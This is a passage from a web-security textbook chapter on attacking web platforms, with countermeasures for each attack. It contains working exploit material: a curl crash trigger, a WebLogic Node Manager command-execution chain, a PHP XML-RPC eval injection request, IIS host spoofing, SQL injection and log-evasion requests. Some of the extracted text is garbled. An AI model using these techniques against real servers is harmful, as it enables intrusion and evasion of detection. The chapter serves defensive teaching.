Applications Reference Netcontinuum Web Application Firewall Microsoft’s URLScan Eeye’s SecureIIS Web Search Engines Google Bing SHODAN Web Crawling and Research Tools Lynx Wget Teleport Pro Offline Explorer Pro OWASP DirBuster Melissa Data Maltego Burp Suite General References HTML 4.01 FORM specification PHP scripting language ASP.NET scripting language The File Extension Source, a database of file extensions and the programs that use them Hacking Exposed: Network Security Secrets & Solutions, Sixth Edition, by McClure, Scambray & Kurtz (McGrawHill Professional, 2009) Link Category:OWASP_DirBuster_Project web4/index.php/maltego interact/forms.html ISBN 978-0-07-161674-3 3 HPalcaktinfogrWmesb 88 Hacking Exposed Web Applications The most prominent components of web applications that intruders will first seek to exploit are vulnerabilities within the web platform. The web platform is comprised of common (not necessarily commercial!) off-the-shelf (COTS) software that sits atop the host operating system but below the custom application logic. The web platform commonly includes: • Web server software (such as IIS or Apache) • Extensions to the web server, such as ISAPI filters and extensions, or Apache modules • Dynamic execution environments like ASP.NET, PHP, and J2EE (also referred to as application servers) • Services and daemons, such as user forums or web guestbook packages In contrast to our definition of the web platform, we consider application-layer components to be anything that is not COTS and thus unique to a particular site or application. For example, Google’s search-engine logic would be considered an application-layer component. In this chapter, we will also focus on software defects rather than misconfigurations. We’ve done this to focus reader attention on what we believe are two separate classes of web platform vulnerabilities: issues that web site administrators and developers can fix directly, and those they must rely on their software suppliers to help fix through software version updates and patches. We’ll discuss misconfiguration vulnerabilities in Chapter 8. One last scope clarification: this chapter will focus on the nuts and bolts of web platform attacks and countermeasures, mostly using small-scale tools and techniques. Please see Chapter 10 for a discussion of large-scale automated web security assessment using web security vulnerability scanners. Historically, web server software vulnerabilities were one of the easiest ways to exploit a web site, but more recently, many popular web server software development teams have become increasingly security conscious, primarily because their products have taken a tremendous beating from hackers for so many years. Microsoft’s IIS is the poster child for this phenomenon. Although severe vulnerabilities used to be found with startling regularity in the IIS product line circa versions 4 and 5, newer versions have been relatively untouched, thanks largely to an invigorated attentiveness to security in the IIS development process. None of this should be taken to mean that you can ignore web platform vulnerabilities, of course. We’ve seen situations where six vulnerable web servers out of a farm of over 10,000 resulted in the total compromise of an entire enterprise network within a few days. Even worse, as we will demonstrate in this chapter, the hacking community continues to evolve their toolset to enable ever easier identification and exploitation of such faults. This chapter will describe how to find, exploit, and defend common security vulnerabilities in the most popular web platforms. Our discussion will be organized as follows: Chapter 3: Hacking Web Platforms 89 • Point-and-click exploitation • Manual exploitation • Evasion techniques As always, we’ll wrap up with coverage of common countermeasures and security best practices to protect against these attacks. POINT-AND-CLICK EXPLOITATION USING METASPLOIT The Metasploit Framework is an open-source platform for developing, testing, and launching exploit code. It is easily amplified with pluggable exploit modules contributed by the worldwide community of folks engaged in “legal penetration testing and research purposes only,” according to the Metasploit web site. Metasploit provides for easy exploitation of all types of vulnerabilities, including web platform holes. For those interested in a commercially supported tool, check out Metasploit Express from Rapid7, CORE IMPACT from Core Security Technologies, or CANVAS by Immunity. For links to further information about Metasploit, CORE IMPACT, and CANVAS, please see “References & Further Reading” at the end of this chapter. To understand the ease-of-use that Metasploit provides, we’ll first walk through an example of exploiting a common web platform software defect the old-school way, without the Framework. As you saw in Chapter 2, discovering the make and model of a web server is fairly straightforward. It’s also no real stretch to research published vulnerabilities in the identified server software. Let’s take, for example, a recent vulnerability in Sun Java System Web Server, as described in Common Vulnerabilities and Exposures CVE-2010-0361. All an attacker needs to do is figure out how to trigger the vulnerability. For this task, we refer to the original report by Evgeny Legerov and attempt to re-create the original exploit: curl –X OPTIONS –O ''`perl –e 'print "A" x 500'` This simple DoS-style exploit caused the remote server to crash. As you just witnessed, exploiting a known vulnerability to simply crash a server is quite straightforward and doesn’t require much effort. Trying to figure out how to exploit the issue to achieve arbitrary code execution, however, requires additional work. But in our culture of immediate gratification, the process of debugging, analyzing, and crafting a functional exploit is too much work. And, frankly, we’re lazy and have books to write. So we want the easy way, and thankfully there are useful applications that automate the entire process. We’ll now walk through the same example using Metasploit Framework to illustrate the power and efficiency of the tool, even in the hands of semi-skilled adversaries. We first grab the Framework distribution, install it, and we’re ready to roll with prepackaged exploits within five minutes. Metasploit even sports a swift installation wizard. How 90 Hacking Exposed Web Applications convenient—and people think hacking is hard work. Once installed, Metasploit can be accessed by either its command line or web interfaces. Since we’re big fans of web applications, we’ll use the web GUI for our demonstration. After launching Metasploit, we see a listing of all of the exploits it supports, as shown in Figure 3-1. We spot the Java System Web Server WebDAV overflow exploit and select it. Metasploit then displays a helpful screen that provides a description of the vulnerability, complete with references. In the screen shown in Figure 3-2, we choose the type of system our target is running. Our earlier research told us that the web server is running Windows x86, so we select that version. After selecting the target, Metasploit displays the next screen that enables us to select from a number of payloads that can be delivered to the server. For this attack, a simple remote shell would be a good choice. Once we hit the Exploit button, Metasploit displays the success status of the payload delivery, and we’re presented with console access to the remote server, as shown in Figure 3-3. See how easy that was? Now where’s the fun in that? Figure 3-1 Playing “Pick your exploit” with Metasploit Chapter 3: Hacking Web Platforms 91 Figure 3-2 Metasploit makes hacking so easy. Figure 3-3 Exploit successful! 92 Hacking Exposed Web Applications MANUAL EXPLOITATION We showed you the easy way first because that’s probably the way the majority of attacks are performed (since most malicious hacking follows the path of least resistance). However, more sophisticated attackers may expend substantially more time and effort to bring a web server down, so we’ll take some time in this section to illustrate some of the finer points of a handcrafted attack. The key things to notice in this example are the increased level of time and skill brought to bear on identifying and then exploiting the vulnerability, as opposed to the Metasploit example. Take-home point: just because you run a web platform that doesn’t rate a ton of attention from projects like Metasploit doesn’t mean you’re any less vulnerable! Oracle WebLogic Node Manager Remote Command Execution Popularity: 1 Simplicity: 5 Impact: 9 Risk Rating: 5 In May 2010, a vulnerability was discovered in the WebLogic Node Manager service that ultimately allowed the execution of arbitrary commands on a WebLogic server. WebLogic is a popular J2EE platform from Oracle. The WebLogic Node Manager is an administrative service for starting and stopping WebLogic server instances. It uses a straightforward text-based network protocol to communicate with clients and, by default, encapsulates traffic using SSL on port 5556/ TCP. Due to the protocol’s straightforward syntax, using tools such as netcat, OpenSSL, or NCat to communicate with the Node Manager service is easy: $ ncat --ssl 5556 HELLO +OK Node manager v10.3 started You can see that we connected to the Node Manager service at and issued the HELLO command. The service responds by sending us a success code along with the version of the service: 10.3. Some would call this a bug; some would call it a feature. Either way, the service discloses version information to unauthenticated remote users, useful information when you are crafting a plan of attack. The Node Manager protocol requires that most commands, other than HELLO, must specify a valid WebLogic domain. According to Oracle, a WebLogic domain is defined as: The basic administration unit for WebLogic Server instances. A domain consists of one or more WebLogic Server instances (and their associated resources) that you manage with a single Administration Server. After specifying the WebLogic domain name, you are required to authenticate to Node Manager using the USER and PASS commands. This prevents unauthorized users from Chapter 3: Hacking Web Platforms 93 calling dangerous Node Manager commands such as EXECSCRIPT, which is designed to execute a program or script specified by the user. The user-specified script can be any executable file in the working directory of the currently selected WebLogic domain. So you can see a sample of the thinking behind web platform vulnerability research, we will re-create the behind-the-scenes sequence of events leading to the discovery of a flaw in the implementation of the DOMAIN, USER, and PASS commands in Node Manager, and the eventual compromise of the WebLogic server by exploiting the vulnerability. When researching a vulnerability, pay attention to behavior or functionality that could provide additional leverage when developing an exploit. Chaining multiple issues together to create a working exploit is often a necessity. The first step in researching the vulnerability is to examine the WebLogic 10.3.3 application source code responsible for handling Node Manager commands. In order to examine the WebLogic code, we first have to decompile it. Because many of the components in WebLogic are written in Java, this is an easy job. Several Java decompilers are available—the one used for this research is called jad (for Java Disassembler). It is available for free and runs on a variety of operating systems (see the “References & Further Reading” section for a link to jad). Other types of binaries that are more difficult to decompile than Java, of course, require more complex analysis techniques (such as diff’ing binary patches). But the objective of this step in exploit development remains the same with any binary: determine the root cause of the vulnerability as close to the source code as possible. The WebLogic class files are stored in a Java Archive file called “weblogic.jar” in the WebLogic installation directory. Java Archives are actually just ZIP files with a “.jar” extension, so you can simply extract their contents using most popular unzip tools. As noted earlier, EXECSCRIPT is a powerful administrative command exposed by Node Manager. Instinctively, we go for the jugular by searching for the text string “EXECSCRIPT” within the extracted class files. The following files are targeted for decompilation: $ egrep -r EXECSCRIPT * Binary file weblogic/nodemanager/common/Command.class matches Binary file weblogic/nodemanager/server/Handler.class matches Binary file weblogic/nodemanager/client/NMServerClient.class matches Binary file weblogic/nodemanager/client/ShellClient.class matches Binary file weblogic/nodemanager/client/NMClientTool.class matches After some additional digging within each of these files, we determine that Handler .class implements EXECSCRIPT and all of the other Node Manager commands. By decompiling Handler.class with jad, we can take a look at the original Java source code. Our analysis indicates that Node Manager compares user-supplied commands to a list of valid commands, with an important exception: the DOMAIN command is handled by a call to another routine known as handleDomain(). Our further analysis of the 94 Hacking Exposed Web Applications source code indicates that the DOMAIN command accepts two parameters: The first parameter is the name of the WebLogic domain on which the Node Manager client wishes to work. The second parameter is used to specify the directory in which the domain configuration files are located. The handleDomain() method passes the two parameters to getDomainManager(), which creates an instance of the DomainManager class; the source code for it is excerpted here: Map map config.getDomainsMap(); if(s1 null) { s1 (String)map.get(s); if(s1 null) { for(Iterator iterator domains.values().iterator(); iterator.hasNext();) { DomainManager domainmanager (DomainManager); if(domainmanager.getDomainName().equals(s)) { domainmanager.checkFileStamps(); return domainmanager; } } s1 config.getWeblogicHome(); } } s1 (new File(s1)).getCanonicalPath(); By looking carefully at this code, we see that if the user doesn’t specify a working directory in the second parameter, getDomainManager() attempts to find the correct directory by searching the WebLogic configuration for a domain that matches the userspecified domain name; if a match is found, the working directory is set accordingly. If no match is found, an error is thrown and the DOMAIN command fails. This is fine, but what happens if the user specifies a working directory? WebLogic accepts the user-supplied value and uses it as the working directory for the current Node Manager session! This means users can control the location from which WebLogic reads its domain configuration files. It turns out that it is possible to specify fully qualified paths, including UNC paths, as Node Manager working directories. Consider the following example: DOMAIN my domain \\\c$ -ERR I/O error while reading domain directory Here we tell WebLogic that our working directory is the c$ Windows share on the host WebLogic attempts to load the domain configuration files from the Chapter 3: Hacking Web Platforms 95 share but fails because no configuration files are stored there. We can verify this by checking the Node Manager log file, which reveals the following message: Domain directory '\\\c$' invalid (domain salt file not found) In order to convince Node Manager to accept our UNC path as a valid location for our WebLogic domain, we need to copy the appropriate configuration files and directory structure onto the share. Before we can do that, we need to know which files to copy. To determine that, we use the Process Monitor tool from SysInternals, which allows us to monitor every file read/write operation made by Node Manager while processing the DOMAIN command. Figure 3-4 shows Process Monitor displaying the names of the files that Node Manager attempts to read from the remote share. By copying valid Node Manager configuration files from an existing WebLogic installation and placing them on the remote share, we can make Node Manager accept our UNC path as a valid working directory. After copying the files, we try again to force a UNC path: DOMAIN my domain \\\c$ +OK Current domain set to 'my domain' It worked! Having set the domain, we need to authenticate. But how do we obtain a valid set of credentials? The answer is that we don’t need to. WebLogic does not store domain credentials in a central location, but instead in a file called nm_password .properties inside the domain configuration directory. Seeing as we can control the domain configuration directory, we simply copy from a domain that we control (and for which we have already created a username and Figure 3-4 Process Monitor displaying the missing Node Manager files 96 Hacking Exposed Web Applications password) and copy it into our UNC share. After that, the USER and PASS commands can be used to authenticate to Node Manager: DOMAIN base domain \\\c$ +OK Current domain set to 'base domain' USER weblogic +OK NM usr set to 'weblogic' PASS w3bl0g1c +OK Password accepted Having authenticated, it is a simple matter to create a malicious script, copy it to the UNC share, and execute it by calling EXECSCRIPT. For test purposes, we created a batch file called runme.bat with the following content: @echo off echo Hacking Exposed – Web Applications Based on our previous Process Monitor analysis, Node Manager expects all executable scripts to be in the directory bin\service_migration, so that’s where we save it. We can now call the EXECSCRIPT command to run our batch file: EXECSCRIPT runme.bat +OK Script 'runme.bat' executed Success! To double-check that the batch file was indeed executed, we examine the Node Manager log file: May 19, 2010 4:56:31 PM weblogic.nodemanager.server.NMHelper$Drainer run WARNING: '\\\c$\bin\service migration' The last line displays the text Hacking Exposed Web Applications, confirming that runme.bat actually ran. With that, we have shown how multiple implementation bugs can be chained together to create a devastating vulnerability that can be exploited to execute arbitrary commands on a WebLogic Node Manager server. Oracle WebLogic Node Manager Remote Command Execution Countermeasures In order to prevent attackers from exploiting this vulnerability, the WebLogic server should have Node Manager either disabled or firewalled to allow connections from only the central management system. Oracle has also released a patch to address this issue. Chapter 3: Hacking Web Platforms 97 The patch should be tested and deployed as soon as reasonably possible to the affected systems. Apache Tomcat Default Blank Admin Password Popularity: 9 Simplicity: 9 Impact: 9 Risk Rating: 9 The Apache Tomcat server, a popular implementation of Java Servlet and Java Server Pages, uses a blank password for the administrative user, by default, on the Windows platform. On UNIX, no administrative user is created by default; the user must be added manually after installation. This behavior can leave any Tomcat deployment vulnerable to administrative-level compromise. To illustrate how an attacker can find such a server, we installed Tomcat 6.0.0 on the host For this example, we assume the default administrative URL of has not been changed. We can try viewing the administration page with a web browser, as 8080 is a commonly used HTTP port: Seeing the Tomcat login page, we try logging in as admin with a blank password: The login succeeded! Chances are this is a Windows Tomcat installation, unless someone explicitly added an admin user with a blank password on a UNIX system. 98 Hacking Exposed Web Applications Apache Tomcat Default Blank Admin Password Countermeasure The Apache Foundation has released fixed versions of Tomcat that address this issue in the installer. When deploying Tomcat, make sure to install the latest version available. If an older version of Tomcat is required, perform the installation on an isolated host and update the $CATALINA_BASE/conf/tomcat-users.xml file either to remove the admin user or to set a password explicitly in the file. PEAR/PHP XML-RPC Code Execution Popularity: 9 Simplicity: 9 Impact: 9 Risk Rating: 9 In July 2005, a vulnerability was found in PEAR/PHP XML-RPC, which allowed remote PHP code execution. This exploit had a very far-reaching impact, as many popular freeware applications used PEAR/PHP XML-RPC for their web services libraries. These apps included PostNuke, Drupal, b2evolution, and TikiWiki, to name a few. In fact, a worm was released in November 2005 that made use of this exploit (among others), which is true to form for vulnerabilities that are this widespread. The worm was named Lupper or Plupii, depending on which malware vendor you asked. This is how the exploit works: in the XML parsing engine, there is an eval() call that embeds user input from the outside XML request, allowing an attacker to craft a simple XML request and embed an attack string that breaks out of the eval() statement and allows piggybacking of PHP code. This exploit resembles the same type of attack method as SQL injection or XSS, as the attack string has to be munged to fit in the surrounding code to execute properly. Let’s take a closer look at how this exploit works. In this example, we will walk through exploiting a vulnerable version of PhpAdsNew that uses PHP XML-RPC. PhpAdsNew uses a file called adxmlrpc.php for accepting web service requests, which, in turn, calls the XML-RPC library to process those requests. The actual attack is shown next and is quite simple. The attack is contained in the “name” field and consists of terminating the existing quote and passing in a PHP command to execute a directory listing (as shown in bold text). The adxmlrpc.php script is just a gateway to the vulnerable XML-RPC library. In the case of other vulnerable applications, the exploit body is the same but the script being posted to changes to whatever script the application uses to process XML requests. POST /phpAdsNew/adxmlrpc.php HTTP/1.0 Host: localhost Content-Type: application/xml Chapter 3: Hacking Web Platforms 99 User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Content-Length: 162 Connection: Close junkname');passthru("dir");//junk The vulnerable server responds with a directory listing, as the remote attacker directed: HTTP/1.1 200 OK Connection: close Content-Type: text/html Cache-control: no-store, no-cache, must-revalidate, post-check 0, pre-check 0 X-Powered-By: PHP/4.4.0 Server: Srv/ Volume in drive C has no label. Volume Serial Number is 98C0-5EE5 Directory of C:\Apache\docs\phpAdsNew 11/11/2010 12:11 PM . 11/11/2010 12:11 PM .. 01/13/2010 04:43 PM 6,166 adclick.php 03/14/2010 10:27 AM 3,280 adcontent.php 03/14/2010 10:12 AM 5,077 adframe.php 01/13/2010 04:43 PM ,251 adimage.php 03/08/2010 12:14 AM 4,435 adjs.php 01/13/2010 04:43 PM 6,250 adlayer.php 01/13/2010 04:43 PM 4,122 adlog.php 11/11/2010 12:11 PM admin 01/13/2010 04:43 PM 8,618 adpopup.php 01/13/2010 04:43 PM 9,877 adview.php 10/09/2010 07:39 PM 73 adx.js 01/13/2010 04:43 PM 5,867 adxmlrpc.php 11/11/2010 12:11 PM cache 11/11/2010 12:11 PM client 11/10/2010 03:57 PM 6,706 01/13/2010 04:43 PM 1,144 index.php 11/11/2010 12:11 PM language 11/11/2010 12:11 PM libraries 10/29/2010 10:01 PM 15,515 LICENSE 11/11/2010 12:11 PM maintenance 11/11/2010 12:11 PM misc 01/13/2010 04:43 PM 2,254 03/15/2010 11:20 AM 5,273 README 16 File(s) 87,908 bytes 100 Hacking Exposed Web Applications 9 Dir(s) 10,690,588,672 bytes free faultCode 1 faultString Unknown method As you can see, this attack is very simple and very effective. We’ll take a closer look as to how this issue actually works by reviewing the code. The security issue lies in a piece of code located in the file that ships with the library. Inside the parseRequest() function is this chunk of code: // now add parameters in $plist ""; for($i 0; $iaddParam(' . $_xh[$parser]['params'][$i]. ");"); } This function takes each parameter that is defined in the XML request and embeds it in an eval() function. The bolded portion of the text is the parameter name that is supplied via user input. So by injecting a parameter name that breaks out of the string via a single quote, the attacker can have his or her PHP code execute. In this case, we can just pass in a parameter name of ','')); phpinfo();/* and cause the code to appear like the following example, causing the phpinfo() function to run and the rest of the PHP code to be commented out. eval('$m->addParam('','')); phpinfo();/* PEAR/PHP XML-RPC Countermeasure Both PHP XML-RPC and PEAR XML-RPC released patched versions of their library that eliminates this vulnerability. For PHP XML-RPC, upgrade to version 1.2 or higher, and Chapter 3: Hacking Web Platforms 101 for PEAR XML-RPC, upgrade to version 1.4.3 or higher. Locations for obtaining these patches are listed in the “References & Further Reading” section at the end of this chapter. Remote IIS 5.x and IIS 6.0 Server Name Spoof Popularity: 3 Simplicity: 3 Impact: 3 Risk Rating: 3 This is a vulnerability that slipped below the radar for most people, even though its impact is quite high if you look at it closely. The original publication of this issue demonstrated how an attacker can access portions of ASP code, but when examining it more deeply, this attack gives an attacker the ability to spoof hostnames in badly coded applications. Let’s take a closer look at how this works. The trouble occurs while developing a web application in ASP or .NET, where a developer needs to access the IP address of the web server where the application resides. A lot of developers will make one of the following calls in order to obtain the IP address or hostname of the web server the application is running on: Request.ServerVariables("SERVER NAME") (ASP) Request.ServerVariables["SERVER NAME"] (.NET) These calls return the "SERVER_NAME" value of the local environment variable. If the request originates from the Internet, the value of the variable is usually the web server’s IP address. If the request is from the actual web server, the variable’s value is "localhost". This behavior is summarized in Table 3-1. Developers often use this functionality to check whether or not the request is from localhost, and if the request is from localhost, then they will enable some level of restricted functionality to be opened. For example, developers will use this method to block requests to the administration page unless the request originates from localhost. This specific vulnerability results from the way Microsoft used this method to handle their error files. By default, all IIS installations have the IISHelp directory that contains Origin of request Web client Web server Value of SERVER_NAME variable localhost Table 3-1 The Value of the SERVER_NAME Variable Depends on the Origin of the Request 102 Hacking Exposed Web Applications default IIS error messages. By default, the 500-100 error code is pointed at the “/iishelp/ common/500-100.asp” page. Thus, for any 500 error that occurs on the IIS server, IIS will use that page as a template for the response displayed back to the user. This behavior is very common for VBScript errors and database errors. To determine if the error is being displayed to a local user, the code of 500-100.asp on Microsoft IIS 5.x uses the Request.ServerVariables("SERVER_NAME") API. If so, the error page dumps out source code that reveals the exact location where the error occurred. If the client is not local, then a generic error page is displayed, as shown in Figure 3-5. The vulnerability is that the "SERVER_NAME" variable can be overwritten by specifying a value in either the Host: header or in the URL as GET http://spoof/ file.asp. For example, by identifying ourselves as localhost with this request: GET http://localhost/product detail.asp?id a HTTP/1.0 Host: Figure 3-5 A normal IIS error message when seen from the Internet client displays generic information. we now receive the response shown next. Chapter 3: Hacking Web Platforms 103 Notice that this time we receive source code that accompanies the error message. While this, by itself, isn’t very impressive, what we like about this issue is the vulnerability’s sheer quirkiness and potential. It’s not a buffer overflow or a path traversal attack, but if you sit back a moment to consider the possible impact of this vulnerability, you’ll find it’s quite impressive. We can see multihost situations where developers could make use of this variable to restrict access to certain sites. In fact, we recently had the opportunity to make use of this issue and discovered that if we acted as localhost, we were taken to a developer administration page that allowed us to view all of the debugging information related to that web site. Thanks, developer! This spoof attack also brings to mind another closely related development issue that you’ll commonly see. When using ASP and .NET, many developers will pull user input by using a call like this: Username Request["username"] Let’s take a closer look at this. The correct way to determine if a user is coming from localhost or a specific IP address is to check the "REMOTE_ADDR" server variable. This tells you the client IP address. That’s why developers might add a line like this in their code, if(Request["REMOTE ADDR"] "") thereby sending users along their merry way to the administrative page. This works just as it should and will provide server variable’s proper value. But if you’re quick, you can easily identify that this can be bypassed by having users specify the value on the URL like this: ADDR This spoof works because of the order in which input is processed by IIS. IIS first looks in the query collection for REMOTE_ADDR, then postdata, then cookies, and then finally server variables. Because the order in which the variables are checked begins with the query first, user-supplied data always takes precedence over server variables. The number of sites that are vulnerable to this type of mistake is quite amazing. 104 Hacking Exposed Web Applications Remote IIS 5.x and IIS 6.0 Server Name Spoof Countermeasure The countermeasure to this problem is to not use the "SERVER_NAME" variable for any type of hostname or IP address validation. Instead, use "REMOTE_ADDR" but do it properly: Request.ServerVariables["REMOTE ADDR"] This will correctly and safely pull the client’s remote address. A good practice is to always use Request.ServerVariables[] when accessing any server variables. EVADING DETECTION Not all web platform issues necessarily give rise to direct attacks. Log evasion is a good example of a web platform vulnerability that creates no direct path to breaking into a web server but instead obscures detection of the attacker. Next, we’ll present two examples of such issues that allow attackers to bypass the correct logging of their requests. Log Evasion Using Long URLs Popularity: 3 Simplicity: 1 Impact: 5 Risk Rating: 3 Some web server software fails to log URI data beyond a certain number of characters. For example, Sun-One Application Server only logs the first 4,042 characters of a request URI. Microsoft’s IIS has the same issue when a query string or header value is over 4,097 characters. This limit was set to prevent DoS attacks by attackers flooding the logs, but attackers have now used this feature for their own benefit. Let’s look at the IIS example in more detail to illustrate how this feature can be used by attackers to hide their presence in the web logs. When writing to the web logs, IIS will automatically truncate the query string with ellipses “…” when the length exceeds 4,097 characters. This allows an attacker to create a fake query that is filled with 4,097 characters with an attack appended at the end. The web server will still process the request properly and discard the fake parameter, allowing the attack to succeed, but it will not log the request. Let’s look at a specific example of using log evasion to hide a SQL injection attack against IIS. This kind of an attack is easily noticeable in the web logs if the attack is executed via the query string, as shown in the following example. GET /article.asp?id convert(int,(select+top+1+name+from+sysobjects+ Chapter 3: Hacking Web Platforms 105 where+xtype 'u')) HTTP/1.0 Connection: Close Host: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) The web server responds as normal, and this is what the log entry looks like: 2005-10-04 22:10:24 - 80 GET /product detail.asp id convert(int,(select+top+1+name+from+sysobjects+where+xtype='u'))| 170|80040e07 |[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvar char value 'tbl Globals' to a column of data type int. 500 4910 561 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+enUS;+rv:1.7.10)+Gecko/ 20050716+Firefox/1.0.6 You can clearly see from the bolded text in this example the SQL injection attack occurring and the database error that was returned in the response. It’s quite easy, at this point, to identify someone attempting SQL injection on the application by parsing the IIS logs for either any SQL database errors going back to the user or any SQL keywords being used in the request. Let’s now look at the same request, hidden inside a long URI designed to evade detection in the IIS logs. We’ll use the same attack request but with a fake parameter of foo being used to fill the log buffer: GET /product detail.asp?id convert(int,(select+top+1+name+from+sysobjects+wh ere+xtyp e 'u'))&foo=<4097 a's> HTTP/1.0 Host: localhost User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Because the foo parameter is fake, the web application ignores it and the attack executes successfully. The log file logs the following request: 2005-10-04 22:31:01 - 80 GET /product detail.asp ... 500 4965 4287 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0) - - Notice how the query string has now been replaced with “...”and no error text from the response is logged. The attacker can proceed with any similar parameter mischief without any logging. 106 Hacking Exposed Web Applications Hiding Requests Using TRACK Popularity: 3 Simplicity: 1 Impact: 5 Risk Rating: 3 TRACK is an HTTP method supported only by IIS that does exactly the same thing as the TRACE method. The response to a TRACK request is a repeat of the request sent. Here’s an example: TRACK / HTTP/1.1 Host: User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) HTTP/1.1 200 OK Server: Microsoft-IIS/5.x Date: Tue, 04 Oct 2005 23:07:12 GMT X-Powered-By: ASP.NET Content-Type: message/http Content-Length: 102 TRACK / HTTP/1.1 Host: User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) In Microsoft IIS 5.x, all TRACK requests are not logged by the web server. This request by itself is not very dangerous and cannot be used to retrieve pages or submit attacks, but it can be used in DoS attacks. We experienced the use of TRACK personally when called to investigate some unusual behavior on a client’s web server. The CPU was high and the machine responded sluggishly. After throwing up a sniffer on the network, we noticed that although HTTP traffic was extremely high, the web logs contained no record of many of the requests visible via the sniffer. After taking a closer look at the web requests using the sniffer, we noticed a lot of TRACK / HTTP/1.0 requests hitting the server that simply were not being recorded in the logs. TRACK requests are also a crafty way to DoS a web server without filling up the logs. IIS Log Evasion Countermeasure A good solution is to use UrlScan to prevent these issues. By default, when UrlScan is installed, a setting of MaxQueryString=2048 will stop the long URL evasion method effectively. In UrlScan 2.5, there is an option called LogLongUrls. By turning this option on, UrlScan will log up to 128K of the request, which will allow any attack to be seen in Chapter 3: Hacking Web Platforms 107 the log. UrlScan can also be used to deny methods such as TRACK or TRACE. A good rule of thumb is to deny all request methods except for HEAD, GET, and POST. WEB PLATFORM SECURITY BEST PRACTICES We’ve covered numerous web platform attacks and countermeasures in this chapter, but we’re the first to admit that it’s impossible to exhaustively catalog all the techniques by which a web platform can fall victim. This section is devoted to summarizing the most important recommendations for hardening web platforms generally, as well as specific information on IIS, Apache, and PHP, which are among the most popular web platforms as of this writing. You can be sure you’ve covered all your bases when deploying these technologies in your online environment. Also see Appendix A for our summarized web security checklist. Common Best Practices The following recommendations apply to any web platform, no matter if it’s off-the-shelf or custom-made. Implement Aggressive Network Access Control—in Both Directions! We hope by this point in the history of the Internet that we don’t need to emphasize the need for strong firewalling of inbound communications to web servers. TCP port 80 (and optionally 443 if you implement SSL/TLS) are the only ports that you should make available to general audiences in the inbound direction (obviously, specific user communities may require special access to other ports for content management, server administration, and so on). Although inbound filtering is broadly appreciated, one common mistake is to ignore outbound access control. One of the first things attackers will seek to do once they’ve gained the ability to run arbitrary commands on a web server is to “shovel” an outbound shell, or make an outbound connection to upload more files to the victim. With appropriate egress filtering on the firewall in front of the web server(s), these requests can be blocked, significantly raising the bar for attackers. The simplest rule is to deny all outbound connections except those that are established, which can be implemented by blocking all packets bearing only a TCP SYN flag. This will not block replies to legitimate incoming requests, allowing the server to remain accessible to outsiders (your ingress filters are tight, too, right?). It’s important to note that sophisticated attackers may be able to hijack legitimate outbound connectivity to bypass outbound filtering. However, in our experience, this is difficult to achieve in practice, and establishing rigorous outbound access control remains one of the most important defensive layers you can implement for your web servers. 108 Hacking Exposed Web Applications Keep Up with Security Patches The most effective way to maintain a strong and secure web platform is to keep the system up-to-date with security patches. There’s no shortcut: you must continuously patch your platforms and applications. Although you can take plenty of other steps to better harden your systems from attacks, pushing security updates out to your systems— as they’re announced—is the most important thing you can do. We recommend the use of automated patching tools such as the Microsoft Update service to help keep your patch levels current. For Apache, we recommend simply subscribing to the Apache announcements list to be notified anytime a new version is released so you can upgrade (see the “References & Further Reading” section at the end of this chapter for links). Don’t Put Private Data in Source Code If you educate your development team not to commit this classic error, you won’t have to worry so much about the latest and greatest source disclosure making the rounds within hacker circles. Some of the most common failures include these: • Cleartext SQL connect strings in ASP scripts Use SQL integrated security or a binary COM object instead. • Using cleartext passwords in application configuration files Always avoid cleartext passwords in application configuration files such as global.asa or web .config. Consider using the Microsoft DPAPI. • Using include files with the .inc extension Rename include files to .asp, .php, or the appropriate extension for your web application platform. • Comments within scripts that contain private information like e-mail addresses, directory structure information, and passwords Don’t document yourself into being highly vulnerable. Make sure to rid your web platforms and applications of information that can be so easily turned against you. Regularly Scan Your Network for Vulnerable Servers The best mechanism for preventing such compromises is to regularly scan for the vulnerabilities that make those compromises possible. A number of very useful web application assessment products are available, such as HP WebInspect and Watchfire AppScan. These do an excellent job of identifying web-platform, application, and configuration vulnerabilities. See Chapter 10 for a review of tools that automate web security assessment. Chapter 3: Hacking Web Platforms 109 Know What It Looks Like When You Are/Have Been Under Attack You always want to approach incident response as seriously as you approach prevention— this is especially true with fragile web servers. To identify if your servers have been the victim of an attack, we recommend following prescribed investigation activities, including the following classic techniques. Using the netstat utility on a compromised web server is one way for you to identify any strange inbound or outbound connections. As we have seen, these connections can sometimes be to rogue shells instantiated following exploitation of a vulnerability. Outbound connections make it more difficult to differentiate hostile from legitimate connections. On Windows XP and later, the netstat command was modified to show programs that use TCP/ IP ports—check out the o switch. Another good point of investigation is the file system. Many canned exploits are circulating on the Internet. And a number of files related to these exploits are commonly reused by script kiddies exactly as originally published by serious security researchers. For example, on IIS, files such as Sensepost.exe, Upload.asp,, and Cmdasp .asp are commonly used to backdoor a system. Although trivially renamed, you’ll at least keep the script kiddies at bay by monitoring for these files. Especially keep an eye out for unauthorized files in writable/executable directories like the IIS/scripts folder. Other commonly employed IIS exploits often deposit files with names like root.exe (a renamed command shell) e.asp dl.exe reggina.exe regit.exe restsec.exe makeini.exe newgina.dll firedaemon.exe mmtask.exe sud.exe sud You should also consider installing filesystem monitoring tools such as Tripwire, which can alert you to any new and unauthorized files that appear on your web servers. Finally, and perhaps most obviously, the web server logs are often the first place unauthorized activity will show up (except if the attacker implements the log evasion techniques we discussed earlier in this chapter). Making it part of your standard operating procedure to analyze log files can often help you detect attacks and compromises. We’re aware of the monumental effort involved in regularly monitoring the logs and file systems of even a moderately sized web server farm, but hopefully these tips can assist you once you have identified a server that may have been compromised already. 110 Hacking Exposed Web Applications IIS Hardening Here are our favorite techniques for securing IIS against common attacks: • Turning off detailed error messages that give potential assailants too much information • Proper placement of web folders • Elimination of unused extension mappings • Savvy use of filesystem access control lists We’ll talk in more detail about these and other techniques in the next sections. Turn Off IIS Detailed Error Messages Detailed error messages should never be enabled on your production servers. They simply give attackers too much information that can be used against you. You should refer to Microsoft TechNet for instructions on how to disable verbose error messages on your version of IIS. Install Your Web Folders on a Drive Other Than the System Drive In the 